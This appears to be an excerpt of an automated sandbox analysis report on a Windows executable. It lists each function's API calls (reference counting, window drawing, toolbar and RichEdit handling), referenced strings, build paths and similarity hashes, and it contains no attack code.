                                                                                                • Instruction Fuzzy Hash: D641DC70A00606ABEB11AF59CC46B7FBBB5FF84708F14442DF405A7382DB799D0087A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004221F0
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00422275
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004222FF
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00422398
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004223F8
                                                                                                  • Part of subcall function 004226B0: InterlockedIncrement.KERNEL32(-00000008), ref: 0042275D
                                                                                                  • Part of subcall function 004226B0: InterlockedIncrement.KERNEL32(-00000008), ref: 004227B5
                                                                                                  • Part of subcall function 00411270: InterlockedDecrement.KERNEL32(74E070F0), ref: 004112A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: Enumerate sources:$WIA 1 filtered sources:$WIA 1 initial sources:$WIA 2.0 filtered sources:$WIA 2.0 initial sources:$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-293180083
                                                                                                • Opcode ID: 469754486b9ede97feb836914668a8bd13a2dbfd3f1a079d2b797dc95de7dafd
                                                                                                • Instruction ID: 326da9d5aa9c955fad89f8cd97a42f62bc867af8479a67db8ba2e28ef91b4329
                                                                                                • Opcode Fuzzy Hash: 469754486b9ede97feb836914668a8bd13a2dbfd3f1a079d2b797dc95de7dafd
                                                                                                • Instruction Fuzzy Hash: E6A1BE71A01629ABCB10EFA5D915BEFB7B4AF04714F44414EE90077381DBBCAE04CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                  • Part of subcall function 00413610: InterlockedIncrement.KERNEL32(004F6640), ref: 0041365C
                                                                                                  • Part of subcall function 00413610: InterlockedDecrement.KERNEL32(004F6640), ref: 004136BA
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00455493
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004554E5
                                                                                                • InterlockedDecrement.KERNEL32(000000FF), ref: 00455501
                                                                                                • InterlockedDecrement.KERNEL32(000000FF), ref: 0045555B
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00455577
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0045567E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: ---------------------------$ $---------------------------$xMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-3112612850
                                                                                                • Opcode ID: 9086d0ff5d1b6d74263d40e785e134ac025b17ef137b4951fa52c049263af0b6
                                                                                                • Instruction ID: 3a30fed55d209ff49e7e7ff2eab65ebd9c0d46aab0408a32dd682371e6c76fa5
                                                                                                • Opcode Fuzzy Hash: 9086d0ff5d1b6d74263d40e785e134ac025b17ef137b4951fa52c049263af0b6
                                                                                                • Instruction Fuzzy Hash: 8A91AF7090160AEBCB00EFA5C851BEFBBB5BF44308F14845DE405A7392DB78AE05CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0042E103
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0042E10F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042E199
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0042E15D
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0042E169
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0042E1F9
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0042E20B
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042E234
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$CriticalSectionValue$EnterException@8LeaveThrow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\framewindowawl.cpp$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 1491966972-3283491211
                                                                                                • Opcode ID: d9a5deb24ded12a422d2a81a358b6699c8e143a0093e7ebd36fcde067a79a3d1
                                                                                                • Instruction ID: 9b1e47bc57f6d3ead8d8e53707e7698e5b3ddb2f74aa968d4f7d18d9bcba2eec
                                                                                                • Opcode Fuzzy Hash: d9a5deb24ded12a422d2a81a358b6699c8e143a0093e7ebd36fcde067a79a3d1
                                                                                                • Instruction Fuzzy Hash: 00616571A00615DFCB10DFA9D884AAEBBF5FF08710F10896AF919DB3A1D738A910CB55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetSystemMetrics.USER32 ref: 004681B8
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                  • Part of subcall function 0044A9E0: CreateDCW.GDI32(?,?,00000000,00000000), ref: 0044AA02
                                                                                                  • Part of subcall function 0044A9E0: GetLastError.KERNEL32(?,00000000,00000000,?,?,00468218,004683C1,?,?,DISPLAY,00000007,004F6640,00000000,00000000,000000FF,00000001), ref: 0044AA0F
                                                                                                • InterlockedDecrement.KERNEL32(004683C1), ref: 00468226
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00468242
                                                                                                • GetSystemMetrics.USER32 ref: 00468295
                                                                                                • OffsetViewportOrgEx.GDI32(?,000000FF,000000FA,00000000,?,DISPLAY,00000007,004F6640,00000000,00000000), ref: 004682C6
                                                                                                • FillRect.USER32 ref: 004682D5
                                                                                                • DrawFrameControl.USER32 ref: 004682EB
                                                                                                • SelectObject.GDI32(?,?), ref: 0046830C
                                                                                                • DeleteDC.GDI32(?), ref: 0046832B
                                                                                                • GetSysColor.USER32(0000000F), ref: 00468333
                                                                                                • DeleteObject.GDI32(00000000), ref: 00468364
                                                                                                • DeleteDC.GDI32(?), ref: 0046837D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DeleteInterlocked$DecrementMetricsObjectSystem$ColorControlCreateDrawErrorFillFrameIncrementLastOffsetRectSelectViewport
                                                                                                • String ID: DISPLAY$xMS$xMS
                                                                                                • API String ID: 3944240488-798124718
                                                                                                • Opcode ID: 6f9c4942b79ce6faa9795a3ea07c3563fd3f4d2f88e197b610cc081fafeab47b
                                                                                                • Instruction ID: 575aad56c9d8b5f3314cf8e930732dbed61ebf4ac4528e78984bed2ae6142d4d
                                                                                                • Opcode Fuzzy Hash: 6f9c4942b79ce6faa9795a3ea07c3563fd3f4d2f88e197b610cc081fafeab47b
                                                                                                • Instruction Fuzzy Hash: 52619AB0901249EFEB10DFA4DD49BEEBBB8BF08704F144119E501B72C2DBB95A04CB69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00488217
                                                                                                • GetProcessHeap.KERNEL32(00535528,00000020,00535528,00535528,00535528,00000000,00535528,00535564,?,00535528), ref: 0048829F
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004882A6
                                                                                                • LeaveCriticalSection.KERNEL32(00000001,00535528,00000000,00535528,00535564,00000001,00535528,00535528,00535528,00535528,00000000,00535528,00535564,?,00535528), ref: 0048831F
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 00488342
                                                                                                • EnterCriticalSection.KERNEL32(00000001,00535528,00000000,00535528,00535564,00000001,00535528,00535528,00535528,00535528,00000000,00535528,00535564,?,00535528), ref: 00488361
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0048838B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$CriticalDecrementHeapSection$AllocEnterIncrementLeaveProcess
                                                                                                • String ID: Ot Ut$@fO$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\inc\object.h$d:\build\teamagent\_work\1\s\0\fineobjects\src\resourceinfo.cpp$dUS$dUS$dUS
                                                                                                • API String ID: 3712283637-2957923773
                                                                                                • Opcode ID: 01f6ef0e592de4c1c2f9e17222ce560c9531c15f8c0d424f3b1aa8842e5e4678
                                                                                                • Instruction ID: bf610eb8f4a0294a46f2ed6ad45c852f197d1f408316b9c16481b8b8c18a96d4
                                                                                                • Opcode Fuzzy Hash: 01f6ef0e592de4c1c2f9e17222ce560c9531c15f8c0d424f3b1aa8842e5e4678
                                                                                                • Instruction Fuzzy Hash: 5851D275A00604EFDB10EF64CC49BAF7BA8BF44B14F04891EF955A7381DB79A900C758
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                  • Part of subcall function 00430AB0: IsWindow.USER32(00000001), ref: 00430AE3
                                                                                                  • Part of subcall function 00430AB0: InterlockedIncrement.KERNEL32(00530380), ref: 00430B11
                                                                                                  • Part of subcall function 00430AB0: GetClassNameW.USER32 ref: 00430B80
                                                                                                • InterlockedDecrement.KERNEL32(004E0E9C), ref: 00443399
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0044345C
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0044348A
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004434B8
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 004434DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$ClassNameWindow
                                                                                                • String ID: RICHEDIT$RICHEDIT50W$RichEdit20A$RichEdit20W$`C$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2717138659-2289262680
                                                                                                • Opcode ID: 349b268f9662a565790192b1bcdb052c7f7281c25faff88031200b8ce862ddf8
                                                                                                • Instruction ID: 8a85e6fcff39586e0b0cd395a88b0a0c66a5905087d203fc2287b74b68a0ed29
                                                                                                • Opcode Fuzzy Hash: 349b268f9662a565790192b1bcdb052c7f7281c25faff88031200b8ce862ddf8
                                                                                                • Instruction Fuzzy Hash: 1E51AE70A01705ABEB11EF64C946BEEBBB4AF04B15F04855EE941773C2DB785E00CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004422DC
                                                                                                • IsWindow.USER32(00000000), ref: 00442305
                                                                                                  • Part of subcall function 00430F20: GetWindowLongW.USER32(?,000000F0), ref: 00430F38
                                                                                                  • Part of subcall function 00430F20: GetParent.USER32(?), ref: 00430F42
                                                                                                  • Part of subcall function 00430BB0: IsWindow.USER32(?), ref: 00430BDF
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0044232A
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00442331
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0044238B
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00442392
                                                                                                • TlsGetValue.KERNEL32(?,?), ref: 004423D5
                                                                                                • TlsSetValue.KERNEL32(0053011C,?,?), ref: 004423F3
                                                                                                • TlsSetValue.KERNEL32(0053011C,?), ref: 0044242C
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0044243A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrementValueWindow$LongParent
                                                                                                • String ID: xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 3943591400-1620073666
                                                                                                • Opcode ID: d74a39f6017059593697d38e9672435e31f8b31c882721a09927410933fb2624
                                                                                                • Instruction ID: 59bad9526a36e940192447eecc05b34eed418b928b2cf62578d3486adb42776a
                                                                                                • Opcode Fuzzy Hash: d74a39f6017059593697d38e9672435e31f8b31c882721a09927410933fb2624
                                                                                                • Instruction Fuzzy Hash: 9951CC31900605AFDB119FA5CD04B6FBBB9FF85701F10856AF801A7361DBB8AE10CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$MetricsSystem$Long
                                                                                                • String ID: @fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl$d:\build\teamagent\_work\1\s\0\awl\src\clientedgethemedrawingawl.cpp
                                                                                                • API String ID: 889924446-1829675369
                                                                                                • Opcode ID: d8f330cdae12655a1ca7fc750a3377fbc7174a4cf10956334de6804f18998294
                                                                                                • Instruction ID: 9a7745933311d28c744e34dc05068126667ce8f961ccd91cc2c2095c67b23b8e
                                                                                                • Opcode Fuzzy Hash: d8f330cdae12655a1ca7fc750a3377fbc7174a4cf10956334de6804f18998294
                                                                                                • Instruction Fuzzy Hash: 733116707403156BEB10AB389C06B2B7398BFC4754F45466AFC54E72D2EBA8EC10CA98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Thread$Message$CurrentPostWindow$Peek
                                                                                                • String ID: @fO$@fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl$d:\build\teamagent\_work\1\s\0\awl\src\framewindowawl.cpp$l P
                                                                                                • API String ID: 2433910620-1955646615
                                                                                                • Opcode ID: 30815ff8c5c996462cabc1e8261973caf0228aff0b187f12e10353f9d9befa2c
                                                                                                • Instruction ID: 2a3a818effe4e5d0f850c0a57d33564f91a2aa79981adf89ece050d6ea4defa0
                                                                                                • Opcode Fuzzy Hash: 30815ff8c5c996462cabc1e8261973caf0228aff0b187f12e10353f9d9befa2c
                                                                                                • Instruction Fuzzy Hash: 2F31DC71B80314ABE730AB649D47F7F76A4AF44F04F10451AF641BB6C1DBF9A4008699
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ControlDeleteDrawFillFrameObjectRect
                                                                                                • String ID:
                                                                                                • API String ID: 762692721-0
                                                                                                • Opcode ID: 49f4fbfd17af0bc75656bc4f972cda821d72216fc449e6b46b6e725a96f114f9
                                                                                                • Instruction ID: 7834f923a6875af3f7ad2295c49d0313ec7a3871d32429fddb08ef7a55286f11
                                                                                                • Opcode Fuzzy Hash: 49f4fbfd17af0bc75656bc4f972cda821d72216fc449e6b46b6e725a96f114f9
                                                                                                • Instruction Fuzzy Hash: 4AD10875900249EFDF10CFA8D988BAEBFB8FF49304F148159E805B7281C7B55A49CB65
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0045D171
                                                                                                • SendMessageW.USER32(?,00000418,00000000,00000000), ref: 0045D1A7
                                                                                                • IsWindow.USER32(?), ref: 0045D1C8
                                                                                                • SendMessageW.USER32(?,00000417,00000000,?), ref: 0045D200
                                                                                                • IsWindow.USER32(?), ref: 0045D2B5
                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000000), ref: 0045D2EB
                                                                                                  • Part of subcall function 0043CEC0: IsWindow.USER32(?), ref: 0043CED6
                                                                                                  • Part of subcall function 0043CEC0: InvalidateRect.USER32(?,00000000,00000001), ref: 0043CF07
                                                                                                  • Part of subcall function 0043CEC0: GetLastError.KERNEL32 ref: 0043CF11
                                                                                                  • Part of subcall function 0046C270: TlsGetValue.KERNEL32(00000000,?,?,00000004,0052BF68,00000004), ref: 0046C292
                                                                                                  • Part of subcall function 0046C270: TlsSetValue.KERNEL32(0053011C,?,?,00000004,0052BF68,00000004), ref: 0046C2B0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$MessageSend$Value$ErrorInvalidateLastRect
                                                                                                • String ID: @fO$@fO$@fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h$d:\build\teamagent\_work\1\s\0\awl\src\toolbarawl.cpp
                                                                                                • API String ID: 1234314594-1401853776
                                                                                                • Opcode ID: e5e1fe3b5f2c7bb7a458c3aca2c2e39f6ba99f6eac768dfac84fa8d7d4d66bcb
                                                                                                • Instruction ID: ba8f992efce061da8a3ce7103c82e8422056e0bbe068aa0297a32271ac84c2df
                                                                                                • Opcode Fuzzy Hash: e5e1fe3b5f2c7bb7a458c3aca2c2e39f6ba99f6eac768dfac84fa8d7d4d66bcb
                                                                                                • Instruction Fuzzy Hash: 0B61D770A047005BE724DF39CD46B6BB7E4AF94705F008A2EFD85E6292E778E9448A49
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0046EA80: InterlockedIncrement.KERNEL32(00530380), ref: 0046EAB1
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 00410399
                                                                                                  • Part of subcall function 0046ACB0: InterlockedDecrement.KERNEL32(00000001), ref: 0046AD7D
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004103B9
                                                                                                  • Part of subcall function 00497A00: InterlockedDecrement.KERNEL32(00000008), ref: 00497A40
                                                                                                • InterlockedIncrement.KERNEL32(-00000005), ref: 00410430
                                                                                                • InterlockedDecrement.KERNEL32(00000005), ref: 0041044E
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 0041053D
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00410558
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00410574
                                                                                                  • Part of subcall function 00483EC0: EnterCriticalSection.KERNEL32(00534D78), ref: 00483F16
                                                                                                  • Part of subcall function 00483EC0: LeaveCriticalSection.KERNEL32(00534D78,@fO), ref: 00483F6D
                                                                                                Strings
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Errors.h, xrefs: 00410404
                                                                                                • @fO, xrefs: 0041040E
                                                                                                • xMS, xrefs: 0041057D
                                                                                                • xMS, xrefs: 00410561
                                                                                                • @fO, xrefs: 00410471
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h, xrefs: 00410467
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$CriticalIncrementSection$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$@fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Errors.h$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h$xMS$xMS
                                                                                                • API String ID: 2830945347-1092709693
                                                                                                • Opcode ID: 8bc6bc32fdc29b8c2e13c41f72e55062b18ceca6b1bfa061013cbe136a3bec2b
                                                                                                • Instruction ID: 1b6ba9b21890b034712a60a925753b26a8e66eb9496757d5d680977e001d1cda
                                                                                                • Opcode Fuzzy Hash: 8bc6bc32fdc29b8c2e13c41f72e55062b18ceca6b1bfa061013cbe136a3bec2b
                                                                                                • Instruction Fuzzy Hash: 5C71D231A00249EBCB10DF54CD95BEFBBB4AF14704F10459AF545AB281EBB8EA44CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0046EA80: InterlockedIncrement.KERNEL32(00530380), ref: 0046EAB1
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0040F0C9
                                                                                                  • Part of subcall function 0046ACB0: InterlockedDecrement.KERNEL32(00000001), ref: 0046AD7D
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0040F0E9
                                                                                                  • Part of subcall function 0046ACB0: InterlockedDecrement.KERNEL32(00000000), ref: 0046ACEF
                                                                                                  • Part of subcall function 0046ACB0: InterlockedIncrement.KERNEL32(00530380), ref: 0046AD0C
                                                                                                  • Part of subcall function 00497A00: InterlockedDecrement.KERNEL32(00000008), ref: 00497A40
                                                                                                • InterlockedIncrement.KERNEL32(-00000005), ref: 0040F17F
                                                                                                • InterlockedDecrement.KERNEL32(00000005), ref: 0040F197
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 0040F23E
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0040F259
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0040F275
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Errors.h, xrefs: 0040F153
                                                                                                • xMS, xrefs: 0040F27E
                                                                                                • @fO, xrefs: 0040F1BE
                                                                                                • @fO, xrefs: 0040F15D
                                                                                                • xMS, xrefs: 0040F262
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h, xrefs: 0040F1B4
